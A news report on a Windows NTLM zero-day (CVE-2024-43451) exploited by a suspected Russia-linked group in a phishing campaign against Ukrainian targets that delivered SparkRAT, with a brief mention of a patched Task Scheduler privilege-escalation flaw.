A recently patched security flaw in Windows NT LAN Manager (NTLM) was weaponized by a suspected Russia-linked threat actor in a cyber campaign targeting Ukraine.
The vulnerability, tracked as CVE-2024-43451, was actively exploited as a zero-day, allowing attackers to steal sensitive information from targeted systems. CVE-2024-43451 is a spoofing vulnerability that targets the NTLM (NT LAN Manager) authentication protocol. The flaw enables attackers to extract NTLM hashes from remote users with only minimal interaction.
Microsoft has fixed the issue as part of its November 2024 Patch Tuesday release, as well as another actively exploited vulnerability, CVE-2024-49039, which is an elevation of privilege flaw within Windows Task Scheduler. Attackers exploiting this vulnerability can elevate their privileges from a low-level AppContainer environment to Medium Integrity, gaining unauthorized access to resources and RPC (Remote Procedure Call) functions normally restricted to higher privilege accounts.
According to ClearSky researchers who discovered the flaw, the attack exploiting CVE-2024-43451 was launched with a targeted phishing email from a compromised Ukrainian government server, aimed at government personnel and academic institutions. The email, masquerading as a certificate renewal notice, contained a malicious URL file. Upon interacting with the file (either by right-clicking, deleting, or moving it) the vulnerability exploitation was triggered, initiating a connection to an attacker-controlled server and delivering additional payloads, including the SparkRAT malware.
SparkRAT, an open-source remote access trojan, provides attackers with extensive control over compromised systems, enabling remote access, data exfiltration, and system manipulation. To maintain persistence, the attackers employed various techniques, allowing them to retain access even after system reboots, further complicating incident response efforts.
Ukraine's cybersecurity agency CERT-UA attributed the attack to the threat actor group it tracks as UAC-0194, which is believed to have ties to Russia. ClearSky also identified similarities between this campaign and previous attacks from other known Russian-affiliated actors, suggesting either shared resources or a common toolkit.